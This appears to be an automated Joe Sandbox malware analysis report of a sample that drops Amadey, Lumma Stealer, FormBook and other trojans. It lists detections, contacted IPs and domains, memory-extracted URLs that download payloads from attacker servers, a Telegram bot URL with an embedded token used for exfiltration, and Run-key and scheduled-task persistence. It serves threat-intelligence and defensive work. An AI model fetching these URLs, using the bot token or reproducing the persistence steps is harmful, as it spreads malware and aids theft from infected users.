C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exe	100%	Avira	HEUR/AGEN.1313061
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	87%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	28%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exe	34%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	68%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	57%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exe	67%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	58%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	87%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	58%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe	68%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe	57%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\1018906001\003.exe	34%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe	67%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
C:\Users\user\AppData\Local\Temp\245347\Dry.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	53%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\main\7z.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\7z.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	70%	ReversingLabs	Win64.Trojan.Nekark

Name	Malicious	Reputation
aspecteirs.lat	false	high
sweepyribs.lat	false	high
sustainskelet.lat	false	high
45.200.149.15	true	unknown
rapeflowwj.lat	false	high
energyaffai.lat	false	high
grannyejh.lat	false	high
necklacebudi.lat	false	high
crosshuaht.lat	false	high
discokeyus.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.t.com/pk	powershell.exe, 00000015.00000002.3334972035.000001E6EC1BF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/V	950932ab59.exe, 00000034.00000002.3512326183.000000000149E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	vQeyqr1.exe, 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp	false	high
https://go.microsoft.co	powershell.exe, 00000015.00000002.3334972035.000001E6EC1BF000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/S	950932ab59.exe, 00000034.00000003.3458308983.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3513585853.00000000014E3000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/M	950932ab59.exe, 00000034.00000002.3512326183.000000000149E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.php907001	skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://31.41.244.11/files/7781867830/2gwmtZs.exe	skotes.exe, 00000009.00000002.4662164077.00000000013A1000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://31.41.244.11/files/fate/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpncoded	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	false	high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_	skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.php	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpxe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.libertyreserve.com/beta/xml/transfer.aspx	skotes.exe, 00000009.00000002.4668807005.00000000015F2000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.microsoft.P	powershell.exe, 00000032.00000002.3673297976.0000020C3CE85000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://31.41.244.11/files/Krokodyl02/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000015.00000002.3301643124.000001E69006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C24691000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/zhigarko/random.exewU	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.16/well/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpZk)	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/karl/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://schemas.xmlsoap.org/soap/encoding/	vQeyqr1.exe, 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/burpin1/random.exeQU	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://contoso.com/Icon	powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8174428401:AAHxlGtOg4tsy0J0kYm7h8822BuHfnk8vKQ/sendMessage?chat_id=14349	vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	0064eff6c8.exe, 00000012.00000002.3072593719.0000000000409000.00000002.00000001.01000000.0000000E.sdmp, 0064eff6c8.exe, 00000012.00000000.3046784847.0000000000409000.00000002.00000001.01000000.0000000E.sdmp	false	high
http://31.41.244.11/files/martin/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discokeyus.lat/_;	950932ab59.exe, 00000034.00000002.3517224743.0000000001563000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458081477.0000000001563000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	vQeyqr1.exe, 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/unique1/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://sci.libertyreserve.com/	skotes.exe, 00000009.00000002.4668807005.00000000015F2000.00000004.00000020.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/unique2/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/wicked/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://31.41.244.11/files/karl/random.exeZ	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://api.telegram.org	vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ocsp.sectigo.com0	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com	skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.php_	skotes.exe, 00000009.00000002.4662164077.00000000013BB000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpF	skotes.exe, 00000009.00000003.3988275528.00000000015BE000.00000004.00000020.00020000.00000000.sdmp	false	high
http://ocsps.ssl.com0	skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/t	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.phpG	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/api	950932ab59.exe, 00000034.00000003.3458308983.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpN	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.16/luma/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://104.168.28.10/003.exe	skotes.exe, 00000009.00000002.4662164077.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://31.41.244.11/files/1434988227/vQeyqr1.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe	skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpB	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ssl.com/repository0	skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/burpin1/random.exe;U	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.php&	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/inr	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.micro8	950932ab59.exe, 00000034.00000003.3458081477.000000000155F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.php2	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000015.00000002.3301643124.000001E69006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/wicked/random.exej	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://sectigo.com/CPS0	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/loadman/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.16/steam/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.php911001	skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/apip	950932ab59.exe, 00000034.00000003.3459174810.000000000152D000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3516065712.000000000152D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://31.41.244.11/files/zhigarko/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.phpv	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.43/Zu7JuNko/index.phpz	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/6165238488/RzAAR0y.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/dkk	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/	950932ab59.exe, 00000034.00000002.3514958295.000000000150B000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3459174810.000000000150A000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3513585853.00000000014E3000.00000004.00000020.00020000.00000000.sdmp	false	high
http://31.41.244.11/files/wicked/random.exeN	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.43/Zu7JuNko/index.phpe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
http://usbtor.ru/viewtopic.php?t=798)Z	28d287a54d.exe, 0000000D.00000000.2915653913.0000000000423000.00000002.00000001.01000000.0000000B.sdmp	false	high
http://185.215.113.16/off/random.exe	skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000015.00000002.3243887590.000001E680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C24691000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.121.15.192	unknown	Spain	207046	REDSERVICIOES	false
52.168.117.173	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
104.21.21.99	unknown	United States	13335	CLOUDFLARENETUS	false
213.152.176.135	unknown	Netherlands	49453	GLOBALLAYERNL	false
104.168.28.10	unknown	United States	36352	AS-COLOCROSSINGUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
45.200.149.15	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	true
208.95.112.1	unknown	United States	53334	TUT-ASUS	false
149.154.167.220	unknown	United Kingdom	62041	TELEGRAMRU	false
34.226.108.155	unknown	United States	14618	AMAZON-AESUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579159
Start date and time:	2024-12-20 23:11:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	54
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@96/105@0/14
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
17:13:01	API Interceptor	219897x Sleep call for process: skotes.exe modified
17:13:45	API Interceptor	117x Sleep call for process: 2gwmtZs.exe modified
17:13:48	API Interceptor	1x Sleep call for process: 0064eff6c8.exe modified
17:13:53	API Interceptor	69x Sleep call for process: powershell.exe modified
17:14:14	API Interceptor	1x Sleep call for process: WerFault.exe modified
17:14:24	API Interceptor	2x Sleep call for process: 950932ab59.exe modified
17:14:33	API Interceptor	63333x Sleep call for process: 22b0b7688f.exe modified
17:14:42	API Interceptor	13901x Sleep call for process: RzAAR0y.exe modified
17:16:11	API Interceptor	31x Sleep call for process: vQeyqr1.exe modified
23:12:18	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
23:14:16	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
23:15:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exe C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe
23:15:40	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 22b355416f.exe C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe
23:15:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exe C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe
23:16:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exe C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe
23:16:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
23:16:13	Task Scheduler	Run new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
23:16:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 224de4e34e.exe C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe
23:16:31	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 22b355416f.exe C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exe
23:16:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d44a5c682a.exe C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exe
23:16:44	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
23:16:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2002c77d6d.exe C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	1QNOKwVoOT.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
